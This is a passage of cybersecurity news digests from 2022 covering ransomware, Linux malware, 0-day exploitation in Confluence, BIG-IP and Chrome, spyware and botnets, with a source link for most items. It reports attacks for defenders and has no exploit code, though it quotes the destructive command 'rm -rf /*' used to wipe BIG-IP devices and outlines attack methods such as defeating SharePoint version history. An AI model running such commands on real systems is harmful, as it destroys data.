enterprise environments. The only necessary requirement they set for both SharePoint Online and OneDrive is initial access, which can be achieved by compromising the user's account (through phishing attacks, brute-force attacks, etc.), tricking the user into authorising third-party OAuth applications that allow access to these platforms, or through session hijacking, either by hijacking a logged-in user's web session or by hijacking an API token for SharePoint and/or OneDrive. Once accessed, the attack relies on exploiting the "AutoSave" functionality, which allows users to create cloud backups of old versions every time they edit their files. What the attacker does is to reduce the limit of file versions that can be stored to a very small number and encrypt the file more times than the limit that has been entered. In this way, the versions of the files that had been saved prior to the attack are lost and only the encrypted versions are available in the cloud account. Proofpoint has reportedly alerted Microsoft, which has indicated that the functionality works as it should and that old versions of files can be recovered for 14 days with the help of Microsoft Support.

LockBit threatens Mandiant after linking them to Evil Corp The LockBit 2.0 ransomware group announced on its dark web publishing page afternoon, 6 May, the alleged compromise of cybersecurity firm Mandiant and its intention to publish a total of 356,841 files allegedly stolen from the firm. The publication included a file called "mandiantyellowpress.com.7z", which would be related to the domain registered that same day, mandiantyellowpress[.]com, which redirected at the time to ninjaflex[.]com. The LockBit threats followed Mandiant's publication of an article indicating that the Russian-based group Evil Corp had begun using LockBit ransomware in its targets to evade US sanctions. Since the threat became known, Mandiant has always said that they had no evidence of any kind of intrusion, but indicated that they were monitoring the situation. According to Bleeping Computer, which has been able to analyse the data, it is now confirmed that there has been no compromise. What LockBit has published is a message in which they deny the accusations made by what they call "tabloids" (referring to Mandiant) about a possible relationship between LockBit and Evil Corp. The group points out that the scripts and tools for attacks are publicly available and can be used by any user, so a similarity between the tools used by two groups does not mean that they can be linked to a single identity. They also include a final line in their message disassociating themselves from any kind of political ideology or special service of any country. More info: https://www.bleepingcomputer.com/news/security/mandiant-no-evidence-we-were-hacked-by-lockbit-ransomware/ Symbiote: stealthy new malware targeting Linux systems Researchers at BlackBerry and Intezer released information yesterday about a Linux malware they have named Symbiote. The malware, originally detected in attacks on the financial sector in Latin America in November 2021, is notable for its highly advanced capabilities in stealth and process hiding. Symbiote achieves this, in part, by not consisting of an executable itself, but rather a shared object library that is loaded into all running processes via the LD_PRELOAD directive, providing the attacker with rootkit functions, password-stealing capabilities and remote access. Loading itself into numerous processes, the malware can manipulate the responses of various tools and system functions, allowing users and researchers to see only a biased version of the results they are looking for. Among other things, it uses the Berkeley Packet Filter function, observed in backdoors developed by the Equation Group (NSA), to hide malicious traffic and determine which packets are visible when an administrator tries to capture traffic. More info: https://www.intezer.com/blog/research/new-linux-threat-symbiote/ Attacks on telecommunications companies and network service providers The US agencies NSA, CISA and FBI issued a joint security advisory warning about the detection of attacks perpetrated by malicious actors against telecommunications companies and network service providers globally. According to them, this campaign is carried out by exploiting existing vulnerabilities, mainly in network devices, pointing to a total of 16 security flaws in different brands. The advisory also highlights that, by gaining an initial foothold in a telecommunications organisation or network service provider, these malicious actors can identify critical users and systems responsible for maintaining the security of a country's critical infrastructure. Regarding the attribution of these campaigns, no specific actor has been identified as the one carrying out these intrusions, indicating that the purpose of the alert is to urge all organisations to patch the list of vulnerabilities and apply the mitigation measures provided in order to prevent potential security incidents. More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-158a Long-running espionage campaign by actor Aoqin Dragon SentinelLabs researchers have published research reporting the discovery of a state-linked APT called Aoqin Dragon, allegedly running undetected espionage campaigns for 10 years. This new actor is said to have been active against governmental organisations, educational organisations and telecommunications companies, all of them geographically located in Southeast Asia. According to analysts, Aoqin Dragon has developed three major infection mechanisms among its TTPs: between 2012 and 2015 they used malspam campaigns with office document attachments that exploited vulnerabilities CVE-2012-0158 and CVE-2010-3333; between 2016 and 2017 their entry vector consisted of obfuscating malicious executables masquerading as fake antivirus icons; and since 2018, they use a removable disk shortcut file that when executed allows the injection of malicious code. Aoqin Dragon is also notable for using two backdoors, Heyoka and Mongall, to exfiltrate information and allow communication with its victims' networks. More info: https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/ Updates, PoCs and active exploitation of 0-day vulnerability at Atlassian After Atlassian issued a security alert concerning the 0-day vulnerability CVE-2022-26134 in its Confluence Server and Data Center products last week, the company issued an update on Friday afternoon to fix the flaw in the event of a proliferation of exploit attempts. Atlassian has urged customers to upgrade to versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1 of its products as soon as possible, and has also released temporary mitigation measures for those unable to upgrade their software immediately. Several easy-to-implement exploits showing how to exploit the vulnerability to create new administrator accounts, force DNS requests, collect information, and create reverse shells were made public on Friday, and several attempts at exploitation have since been detected, as reported by researchers at Grey Noise. More info: https://www.bleepingcomputer.com/news/security/exploit-released-for-atlassian-confluence-rce-bug-patch-now/

Rapid evolution of the EnemyBot botnet Since its discovery last March by Securonix researchers, the botnet known as EnemyBot, focused on carrying out DDoS attacks, has continued to expand, thanks in particular to the addition of exploits for recent critical vulnerabilities in web servers, content management systems, IoT devices and Android devices. Back in April, samples analysed by Fortinet showed the integration of the exploitation of more than 12 vulnerabilities to exploit flaws in processor architecture. Now, a new report from AT&T Labs reports the detection of a new variant in which exploits have been added for 24 vulnerabilities, most of them critical and some of which do not even have a CVE assigned to them. Among the flaws, it is worth highlighting the addition of exploits for recent important flaws such as those known in VMWare May (CVE-2022-22954), Spring (CVE-2022-22947) or BIG-IP (CVE-2022-1388). This threat has been attributed to the Keksec group, which has specialised in building botnets since 2016. In addition, the malware code has been published in a GitHub repository [6], making it accessible to other threat actors. Thanks to its publication, it has been confirmed that it is a threat built from the code of multiple botnets (Mirai, Qbot or Zbot), which makes it a more powerful and adjustable threat. The rapid evolution of EnemyBot makes it necessary to closely assess the progress of other projects from this group, such as Tsunami, Gafgyt, DarkHTTP, DarkIRC and Necro. More info: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers Mozilla fixes vulnerabilities in its products Mozilla has released a new security update to fix several vulnerabilities affecting its Thunderbird email client and Firefox and Firefox ESR browsers. None of the fixed bugs have been identified as critical, but several vulnerabilities classified as highly critical have been fixed. It should be noted that the exploitation of these flaws by a remote threat agent could lead to the following impacts: remote code execution, evasion of security restrictions, disclosure of sensitive information, spoofing, denial of service and data manipulation. Mozilla recommends upgrading to the following versions of its Firefox 101, Firefox ESR 91.10 and Thunderbird 91.10 products to mitigate the vulnerabilities. More info: https://www.mozilla.org/en-US/security/advisories/ Killnet threatens Italian entities again Italy's CSIRT has issued an alert warning that there is a risk of imminent attacks against national public entities, private entities providing a public utility service or private entities identified with Italy. This warning comes after the hacktivist group Killnet issued a statement on its Telegram channel inciting massive and unprecedented attacks against Italy. This is not the first time that the group has shown interest in this country, having already carried out denial-of-service attacks against it last May. Killnet announced on 24 May that it was launching operation Panopticon, calling on users to become part of the group and providing them with tools to carry out the attacks. The name of the operation, as they have indicated, refers to a type of construction designed so that the whole of a structure can be observed from the inside and from a single point. In relation to the name used, Bleeping Computer suggests that it is possible that DDoS is the main target but that Killnet may want to focus efforts on mitigating this type of attack rather than remediating other types of cyber-attacks, perhaps hinting at some kind of information leakage with the name used. Finally, yesterday Italian media reported that several services such as the Italian state police and the Ministries of Foreign Affairs and Defence had their services interrupted, although the group has not claimed responsibility for such events so far. More info: https://www.bleepingcomputer.com/news/security/italy-warns-organizations-to-brace-for-incoming-ddos-attacks/ Actively exploited 0-day in Confluence Atlassian has issued a security advisory to warn of the active exploitation of a 0-day vulnerability in Confluence for which no patches are yet available. This vulnerability, listed as CVE-2022-26134 and with a critical risk, allows remote unauthenticated code execution in Confluence Server and Confluence Data Center (pending confirmation if in all versions, but most likely so). Exploitation of this vulnerability was detected by the Volexity team during the investigation of a security incident last weekend where they observed that, after initial access through exploitation of this 0-day, the attackers deployed an in-memory copy of BEHINDER, an open-source web server that provides the attacker with capabilities such as in-memory webshells and built-in support for interaction with Meterpreter and Cobalt Strike. Once BEHINDER was deployed, the attackers used the in-memory webshell to deploy two additional webshells to disk: CHINA CHOPPER and another custom file upload shell. Atlassian recommends that customers restrict Internet access to the affected product instances and disable the instances in both Confluence Server and Data Center. Atlassian also said that customers using Confluence hosted in the Atlassian Cloud would not be affected. More info: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Unpatched vulnerability in PayPal Security researcher H4x0r-DZ has disclosed an unpatched vulnerability in PayPal's money transfer service that could allow attackers to trick victims into stealing money by completing targeted transactions through clickjacking attacks. This technique allows an attacker to trick a user into clicking on seemingly harmless elements of a web page for fraudulent purposes: downloading malware, redirecting them to malicious websites, or revealing sensitive information. The researcher discovered that a paypal[.]com/agreements/approve endpoint, designed for billing agreements, and which should only allow tokens of the type billingAgreementToken, actually allowed another type of token to be received. This would allow an attacker to include a specific iframe, which causes a victim logged into the website to transfer their funds to a PayPal account controlled by the attacker simply by clicking a button. The researcher has decided to publish the proof of concept, after reporting the flaw to the company last October 2021 without having received any compensation or fix for this flaw from PayPal. More info: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Predator spyware distributed through 0-days exploitation Researchers from Google's Threat Analysis Group (TAG) have revealed details on the use of new 0-days in Chrome and Android for the distribution of spyware known as Predator, a commercial cyber-espionage tool developed by Cytrox. The researchers report three separate campaigns. The first campaign was detected in August 2021 and exploited a vulnerability in Chrome to redirect to SBrowser (CVE-2021-38000 CVSSv3 6.1). The second campaign started in September 2021 and exploited several vulnerabilities in Chrome to escape the browser sandbox (CVE-2021-37973 CVSSv3 9.8 and CVE-2021-37976 CVSSv3 6.5). Lastly, the third campaign dates from October 2021 and involves the use of 0-days in Chrome and Android (CVE-2021-38003 CVSSv3 8.8 and CVE-2021-1048 CVSSv3 7.8). Despite exploiting different 0-days, the base of the campaigns was the same. The attackers distributed "one-time link" links (valid only once and expiring after 24 hours) by spoofing URL shortening services to Android users via email, from which they distributed the exploits. The aim of the campaigns was to distribute the Android malware called ALIEN, which subsequently downloaded the Predator spyware. Regarding the attribution of the campaigns, the researchers suggest that the actors behind the campaigns are backed up by governments, and they particularly point to at least those of Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain and Indonesia. Their conclusions are in line with investigations carried out by CitizenLab in December 2021. More info: https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/ Distribution of Cobalt Strike via fake PoCs Cyble security researchers have discovered that threat actors have reportedly used fake proof-of-concepts for two recent Windows vulnerabilities to infect their victims with Cobalt Strike. The attackers posted malicious PoCs on GitHub for the remote code execution vulnerabilities CVE-2022-24500 and CVE-2022-26809, both of which were fixed by Microsoft last April. The two repositories belonged to the same GitHub user, named "rkxxz", whose account and repositories have now been removed. The target of this type of practice, which is becoming increasingly common, tends to be individuals involved in information security. According to Cyble's analysis, the malware used in this campaign is a .NET application that displays a fake message about the attempted exploitation of the vulnerability and then executes PowerShell commands to download the Cobalt Strike beacon. More info: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/ 0-day vulnerability in Tails Tails has issued a security advisory warning that a vulnerability has been found in its Tails 5.0 version which could affect users who use the Linux distribution to access the Tor browser. For this reason, they recommend not to use Tor until May 31st, when the update to version 5.1 will be released. This bug is related to the security advisory issued by Mozilla, which fixed two critical vulnerabilities affecting its Thunderbird email manager and Firefox browser. These flaws were classified with the identifiers CVE-2022-1529 and CVE-2022-1802 and were related to a bug in the JavaScript engine, which is also used by Tor. Tails states that, if exploited, it could allow an attacker to obtain confidential information such as passwords, private messages, among others, although the encryption of connections used by Tor to maintain user anonymity would not have been affected. Tails recommends rebooting the system and claims that Mozilla has detected activity related to the exploitation of these flaws. More info: https://tails.boum.org/security/prototype_pollution/index.en.html

VMware fixes critical vulnerabilities in several of its products VMware has issued a security advisory to fix a critical authentication bypass vulnerability affecting several of its products. Identified as CVE-2022-22972 and CVSSv3 9.8, the flaw involves an authentication bypass that affects local domain users and would allow an attacker with network access to the user interface to gain administrator access without authentication. VMware has also released patches for a second serious local privilege escalation vulnerability (CVE-2022-22973 - CVSSv3 7.8) that could allow a threat actor to upgrade their permissions to 'root'. Both bugs affect VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manage products. The publication of these flaws has also prompted entities such as CISA to issue emergency advisories to multiple federal agencies this week, urging them to immediately upgrade or remove VMware products from their networks before next Monday, due to an increased risk of attacks. For its part, VMware has provided patch download links and installation instructions on its knowledge base website, as well as workarounds in case an immediate upgrade is not possible. More info: https://www.vmware.com/security/advisories/VMSA-2022-0014.html New campaign against SQL servers Microsoft's Security Intelligence team has shared on its Twitter profile a new campaign they have recently discovered, which is reportedly targeting SQL servers and is known to use the LOLBin sqlps.exe. Brute-force attacks have been observed to be used for initial access to the SQL server. In addition, they describe that once the server is compromised, the threat actor uses sqlps.exe, a Windows tool used for start-up and PowerShell use in relation to SQL instances, to achieve persistence by executing reconnaissance commands and changing the server's start-up mode to LocalSystem. Attackers also use sqlps.exe to take control of the server by creating a new account with administrator permissions, allowing them to inject payloads into the system. URL: https://twitter.com/MsftSecIntel/status/1526680337216114693 Increased activity of XorDDoS malware Microsoft researchers have published an analysis of the so-called XorDDoS trojan targeting Linux systems, in which they claim to have detected an increase in activity over the last six months. XorDDoS, active since at least 2014, owes its name to the XOR encryption used for its communications with the Command & Control server, as well as to its most characteristic type of attack, namely distributed denial of service (DDoS). To this end, XorDDoS usually focuses its activity on compromising Internet of Things (IoT) devices to generate its botnet for DDoS attacks. Microsoft's analysis details that devices infected with XorDDDoS are later compromised with the Tsunami backdoor, which in turn deploys the XMRing crypto-ominator. Among the TTPs employed by XorDDoS, the use of brute force against accessible SSH services stands out as the main entry vector to obtain root permissions on the compromised machine. It also has modules designed to evade security systems, hiding its activity, which makes it harder to detect. Microsoft provides recommendations to try to fight this threat. More info: https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ CISA exposes commonly used entry vectors CISA, together with authorities in the United States, Canada, New Zealand, the Netherlands, the United Kingdom and the United States, has issued a warning about security controls and practices that are commonly used as initial access during compromises of potential victims. They note that cybercriminals often exploit poor security configurations (miscondivd or unprotected), weak controls and other bad practices as part of their tactics to compromise systems. Some of the most commonly used Tactics, Techniques and Procedures (TTPs) are: exploiting a publicly exposed application [T1190], external remote services [T1133], phishing [T1566], exploiting a trust relationship [T1199] or exploiting valid accounts [T1078]. In order to avoid these techniques, the advisory summarizes a series of recommended practices to protect systems from these possible attacks, highlighting access control, credential reinforcement, establishing centralized log management, the use of antivirus, detection tools, operating exposed services with secure configurations, as well as keeping software up to date. URl: https://www.cisa.gov/uscert/ncas/alerts/aa22-137a

Vulnerability in BIG-IP exploited to erase data On May 4th, F5 fixed, among others, a vulnerability affecting BIG-IP devices (CVE-2022-1388 CVSSv3 9.8), which could allow an unauthenticated attacker with network access to the BIG-IP system, via proprietary IP addresses or an admin port, to execute arbitrary commands, delete or create files, or disable services. The severity of the flaw at the time raised the need for patching, and multiple security researchers warned of the possibility that proofs of concept could be released without delay. Only a few days later, security firms like Horizon3 or Positive Technologies, and some security researchers confirmed the development of functional exploits for the flaw. Since then, massive exploitation has been reported, mainly to download webshells that allow initial access to networks, to steal SSH keys, and to enumerate system information. On the other hand, researchers at the SANS Internet Storm Center have warned of the detection in their honeypots of several attacks that execute the rm -rf /* command on BIG-IP devices. This command is focused on deleting all files, including the configuration files that allow the device to function properly, as the exploit gives the attacker root privileges on the devices' Linux operating system. This type of attack has also been confirmed by security researcher Kevin Beaumont, who warns about the disappearance of multiple Shodan entries from this type of device. More info: https://www.bleepingcomputer.com/news/security/critical-f5-big-ip-vulnerability-exploited-to-wipe-devices/ * * * Microsoft fixes three 0-day vulnerabilities Microsoft has published its monthly security bulletin for the month of May in which it has fixed a total of 75 flaws, including 3 0-day vulnerabilities. One of them is being actively exploited, and 8 critical vulnerabilities that could allow remote code execution or privilege escalation on the vulnerable system. The actively exploited 0-day, categorized as CVE-2022-26925, is a spoofing vulnerability in Windows LSA, which could be exploited by an unauthenticated attacker by calling a method on the LSARPC interface and forcing the domain controller to authenticate via the Windows NT LAN Manager (NTLM) security protocol. According to its discoverer, security researcher Raphael John, this flaw is being exploited and appears to be a new attack vector for PetitPotam, an NTLM relay attack discovered in July 2021. The other two 0-day flaws correspond to a denial-of-service vulnerability in Windows Hyper-V (CVE-2022-22713) and a flaw in the Magnitude Simba Amazon Redshift ODBC driver (CVE-2022-29972, also known as SynLapse). Microsoft recommends applying the security updates as soon as possible. More info: https://msrc.microsoft.com/update-guide/releaseNote/2022-May * * * CNPIC warns of a possible cyber-attack on critical infrastructures Spain's National Centre for the Protection of Critical Infrastructure and Cybersecurity (CNPIC) has sent a security warning to companies considered to be critical infrastructures in the country. In this way they have been alerted to the risk of a possible cyber-attack on companies in critical sectors such as energy, communications and finance, among others. This alert implies that companies should take extreme precautions and protection mechanisms within their IT infrastructure in order to be able to deal with a possible cyber-attack in a preventive manner, and to avoid a possible disruption of services that could affect the functioning of services. The specific type of threat that could cause the possible cyber-attack, as well as the attribution, is not known at this stage, although the aim seems to indicate the disruption of strategic services. More info: https://www.lainformacion.com/empresas/alerta-maxima-en-las-infraestructuras-espanolas-por-riesgo-de-ciberataques/2866557/ * * * Database with nearly 21 million VPN users exposed Researchers at vpnMentor have reported a leak on Telegram of a Cassandra database containing 21 million unique records of VPN service users. The file, initially traded on the dark web in 2021, was reportedly shared for free via the messaging app as of 7 May. A total of 10GB of information includes user data from free VPN services known as GeckoVPN, SuperVPN and ChatVPN. The exposed data reportedly includes usernames, emails, personal names, countries, billing details, randomly generated password strings, and account validity period. The researchers who analysed the database emphasised two things: that 99.5 per cent of the accounts were Gmail addresses, indicating that it is possible that this database is only a fragment of the compromised data; and that the passwords were hashes, salt or random passwords, suggesting that each one is different, making the task of cracking them more complicated. More info: https://www.vpnmentor.com/blog/vpns-leaked-on-telegram/ * * * New Nerbian RAT distribution campaign Researchers at Proofpoint have detailed a malware distribution campaign they have named Nerbian RAT (Remote Access Trojan), after a reference to the fictional location (Nerbia) in the novel Don Quixote in one of the malware's functions. It is a new RAT that uses multiple libraries written in Go, a programming language widely used for malware development, and includes multiple components aimed at evading detection. In the campaign observed, the World Health Organization (WHO) is being impersonated in malspam mails containing alleged information related to COVID-19. These mails include an attached Word document whose enabling of macros will trigger the download of a .bat file that is responsible for executing a PowerShell command to connect to the "Command & Control". As a result, the executable that acts as a dropper for Nerbian RAT will finally be downloaded. The campaign has reportedly been active since 26 April and is said to have been directed primarily against entities in Italy, Spain and the UK. More info: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques

TLStorm 2 - Vulnerabilities in Aruba and Avaya switches Researchers at Armis have discovered five vulnerabilities in the implementation of TLS communications in multiple models of Aruba and Avaya switches. The vulnerabilities are caused by a design flaw similar to the TLStorm vulnerabilities, also discovered by Armis earlier this year, which could allow a malicious actor to remotely execute code on the devices, affecting potentially millions of network infrastructure devices at the enterprise level. The cause of the problem is due to code used by vendors not complying with NanoSSL library guidelines, so at Aruba it can lead to data overflows for vulnerabilities tracked as CVE-2022-23677 and CVE-2022-23676, with CVSS of 9.0 and 9.1 respectively. On the other hand, in Avaya, the library implementation has three flaws, a TLS reassembly overflow (CVE-2022-29860 and CVSS of 9.8), HTTP header parsing overflow (CVE-2022-29861 and CVSS of 9.8) and a HTTP POST request handling overflow, with no assigned CVE. In addition, successful exploitation of the vulnerabilities could lead to everything from information leakage, complete device takeover, to lateral movement and bypassing of network segmentation defences. Armis stresses that the network infrastructure itself is at risk and exploitable by attackers, meaning that network segmentation can no longer be considered a sufficient security measure. URL: https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/ * * * Millions of IoT devices affected by serious DNS flaw The Nozomi Networks Labs team has discovered an unpatched vulnerability that directly affects the domain name system (DNS) of multiple routers and IoT devices, deployed in various sectors of critical infrastructure. The identified flaw is located in two C libraries (uClibc and uClibc-ng) that are commonly used in IoT products, employed by Linux distributions such as Embedded Gento, and widely used by major vendors such as Netgear, Axis and Linksys. According to the research, a threat actor could use DNS poisoning or DNS spoofing to redirect network traffic to a server under its direct control and thereby steal or manipulate information transmitted by users and perform other attacks against devices to compromise them completely. Nozomi estimates that more than 200 vendors could be affected by this vulnerability, with no CVE identifier as yet, and given that there is currently no patch to fix it, specific technical details about its exploitation have not been released until new firmware versions are available to fix the issue. URL: https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/ * * * Severe vulnerabilities in AVAST and AVG The SentinelOne team discovered in December 2021 two critical vulnerabilities, catalogued as CVE-2022-26522 and CVE-2022-26523, in Avast and AVG antivirus products. These vulnerabilities were reportedly present for exploitation in the products since 2012 and affected the "Anti Rootkit" system in both products. The flaws allowed malicious actors to exploit the socket connection in the kernel driver to escalate privileges to disable the security products, making it possible to overwrite system components, corrupt the operating system and/or perform unhindered malicious operations, such as injecting code, performing lateral movement, installing backdoors, etc. Both vulnerabilities were patched with version 22.1 of Avast antivirus (AVG was acquired by Avast itself in 2016), released on 8 February. It should be noted that despite the length of time these vulnerabilities have existed, no signs of exploitation have been detected. URl: https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ * * * Vulnerability in several ransomware families could prevent data encryption Security researcher John Page (hyp3rlinx) has shown that several of the most recently active ransomware families are vulnerable to a "DLL hijacking" flaw that would prevent the ultimate purpose of encrypting their victims' data. The details of his research have been published through the Malvuln project, created by the researcher himself, where he catalogues vulnerabilities detected in malware samples. The exploitation of the detected flaw consists of a DLL hijacking, a type of vulnerability that is generally used for arbitrary code execution and privilege escalation purposes. In this case, by creating a specially crafted DLL file that impersonates the DLL required for the execution of the malware, the ransomware processes would be intercepted and terminated, thus preventing data encryption. For the time being, Malvuln has published some proof-of-concepts (PoCs) affecting the Conti, REvil, Loki Locker, Black Basta, AvosLocker, LockBit and WannaCry ransomware families, without ruling out that the flaw is perfectly exploitable in other ransomware as well. URL: https://www.malvuln.com/

New malicious RedLine distribution campaign Researchers at BitDefender have published a report on a new RedLine malware distribution campaign. According to the analysts, malicious actors are using the RIG Exploit Kit for distribution, which exploits a vulnerability in Internet Explorer that causes memory corruption when the victim accesses a specially crafted website. This flaw, identified as CVE-2021-26411 with a CVSSv3 of 7.8, was patched by Microsoft in March 2021. Following exploitation of the vulnerability, the kit then distributes RedLine by placing a JavaScript file in a temporary directory, which in turn downloads a second RC4-encrypted payload, generating the final infection process on the victim's computer. According to The Record, Bogdan Botezatu, director of research at Bitdefender, said that in April they identified a total of 10,000 RedLine attacks around the world with their solutions alone, which shows the widespread use of this malware in cybersecurity incidents. Read more: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154425_Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf Privilege escalation in Windows Active Directory Security firm SOCPRIME has published an article stating that security researchers have revealed a flaw in Windows Active Directory (AD) in environments where the default settings are used. This flaw, which could allow a user with access to add machines to the domain without the need for administrator privileges, could lead to privilege escalation on the vulnerable system. This bug, for which a proof of concept exists, could be exploited using the KrbRelayUp tool. A possible mitigation would require changing the default configuration and removing authenticated users from the default domain controller policy. More details on mitigating the vulnerability can be found in Mor Davidovich's research repository. Nimbuspwn: Privilege escalation vulnerabilities in Linux Microsoft researchers have identified two new vulnerabilities, called Nimbuspwn, that could allow an attacker to escalate privileges to root on vulnerable Linux systems. The flaws have been identified as CVE-2022-29799 and CVE-2022-29800, and are found in the networkd-dispatcher component, whose function is to make changes to the state of the network interface. According to the researchers, the chained exploitation of these vulnerabilities would allow malicious actors to achieve root privileges, giving the possibility, at later stages, to deploy payloads, backdoors, distribute malware and/or perform other malicious actions through arbitrary code execution. It should be noted that Clayton Craft, administrator of the networkd-dispatcher component, has implemented the corresponding fixes and users are advised to update their instances to prevent possible attacks. Read more: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/

Fodcha: new DDoS botnet 360netlab and CNCERT researchers have discovered a new botnet focused on conducting denial-of-service attacks, and which is rapidly spreading on the Internet. This new botnet has been named Fodcha, because of the first C2 was in the folded[.]in domain, and due to the fact that it uses the ChaCha algorithm to encrypt network traffic. It spreads through exploitation of n-day vulnerabilities in Android products, GitLab, Realtek Jungle SDK, Zhone Router or Totolink Routers among others; as well as through the compromise of weak Telnet/SSH passwords by using the brute-force attack tool Crazyfia. Fodcha's activity began in January, with a significant increase of attacks on 1 March, but activity was reportedly intensified from the end of March. In fact, around 19 March there was a change in the botnet's versions, which, according to the researchers, was due to a shutdown of the old servers by the cloud providers. Read more: https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/ INCONTROLLER/PIPEDREAM new malware targeting ICS/SCADA environments A new malware targeting industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems has recently been discovered. This malware could lead to system outages, degradation or even destruction. Mandiant researchers have labelled this malware as INCONTROLLER, while Dragos' team has named it PIPEDREAM, noting that it was developed by the threat actor CHERNOVITE. This malware stands out for having a set of tools to attack the systems of its victims, and it does not exploit a specific vulnerability, but rather takes advantage of native functionalities of the affected ICS systems, which is why both researchers and several US security agencies (CISA, the FBI and the CSA) have published a series of measures for detection and protection. It is worth noting that while investigations have found that the malware could target different manufacturers, it contains modules specifically developed for Schneider Electric and Omron programmable logic controllers (PLCs). Read more: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154019_Dragos_ChernoviteWP_v2b.pdf HOMAGE: zero-click vulnerability in iOS used in espionage campaign The Citizen Lab team has published an investigation detailing an espionage campaign carried out between 2017 and 2020, which they have named Catalangate, and which involved the exploitation of several vulnerabilities in iOS. The most relevant is the use of a new exploit for a zero-click vulnerability in iOS used to infect devices with spyware belonging to NSO Group. This vulnerability has been named HOMAGE, it affected an iMessage component and iOS versions prior to 13.1.3, having been fixed in iOS 13.2 (it should be noted that the latest stable version of iOS is 15.4). Likewise, researchers have also detected the use of other vulnerabilities: another zero-click vulnerability discovered in 2020 and called KISMET, which affected iOS versions 13.5.1 and iOS 13.7, as well as another in WhatsApp, also patched CVE-2019-3568. As a result of this investigation, it has been detected that at least 65 people have been infected with the Pegasus and Candiru spyware. Read more: https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ Vulnerabilities in ALAC audio encoding format Researchers at Check Point have announced several vulnerabilities in Apple Lossless Audio Codec (ALAC), also known as Apple Lossless, an audio encoding format. Exploitation of the discovered flaw could allow an attacker to remotely execute code on a vulnerable device by tricking the user into opening a manipulated audio file - an attack they have named ALHACK. ALAC was initially developed by Apple, and in late 2011 the firm made it open-source and has since been incorporated into a multitude of devices and software. Since its release, Apple has updated the proprietary version several times, but the shared code has not been patched since then. It is therefore to be assumed that all third-party vendors using the initial code provided by Apple in 2011 have a vulnerable version. According to the researchers, this is exactly what happened in the case of Qualcomm and MediaTek, which are said to have incorporated the vulnerable code in the audio decoders used by more than half of today's smartphones. The disclosure of the flaws has been done in a responsible way, so before making its discovery public, Check Point alerted MediaTek and Qualcomm, with both firms fixing the vulnerabilities last December 2021: CVE-2021-0674 and CVE-2021-0675 in the case of Mediatek and CVE-2021-30351 in the case of Qualcomm. Technical details of the vulnerability will be made public next May at the CanSecWest conference. Read more: https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/

Critical vulnerability in GitLab allows access to user accounts GitLab has released a security update that fixes a total of 17 vulnerabilities, including a critical vulnerability affecting both GitLab Community Edition (CE) and Enterprise Edition (EE). This security flaw, CVE-2022-1162, rated with a CVSS of 9.1, resides in the establishment of an encrypted password for accounts registered with an OmniAuth provider, allowing malicious actors to take control of user accounts using these encrypted passwords. So far, no evidence of the compromise of any accounts exploiting this security flaw has been detected. However, GitLab has published a script to help identify which user accounts are affected and recommends users to update all GitLab installations to the latest versions (14.9.2, 14.8.5 or 14.7.7) as soon as possible to prevent possible attacks. Read more: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/#script-to-identify-users-potentially-impacted-by-cve-2022-1162 New Deep Panda techniques: Log4Shell and digitally signed Fire Chili rootkits Fortinet researchers have identified that the APT group Deep Panda is exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a new rootkit on infected machines. The group's goal is to steal information from victims in the financial, academic, cosmetics and travel industries. Firstly, the researchers show that the infection chain exploited the Log4j remote code execution flaw on vulnerable VMware Horizon servers to generate a chain of intermediate stages and, finally, to implement the backdoor called Milestone. This backdoor is also designed to send information about current sessions on the system to the remote server. A kernel rootkit called Fire Chili has also been detected, which is digitally signed with certificates stolen from game development companies, allowing them to evade detection, as well as to hide malicious file operations, processes, registry key additions and network connections. Researchers have also attributed the use of Fire Chilli to the group known as Winnti, indicating that the developers of these threats may have shared resources, such as stolen certificates and Command&Control (C2) infrastructure. Read more: https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits Phishing campaign exploits supposed WhatsApp voicemail messages Researchers at Armorblox have reported a phishing campaign that uses voice messages from the WhatsApp messaging platform as a lure to deploy malware on victims' devices. According to the investigation, the attack starts with the distribution of phishing emails pretending to be a WhatsApp notification containing a 'private message' audio message, for which the malicious actors include a 'Play' button embedded in the body of the email along with the length of the audio and its creation date. As soon as the target user hits the "Play" option, they are redirected to a website offering a permission/block message that, through social engineering techniques, will eventually install the JS/Kryptik trojan and the necessary payload to ultimately deploy a stealer-type malware. Armorblox stresses that the malicious 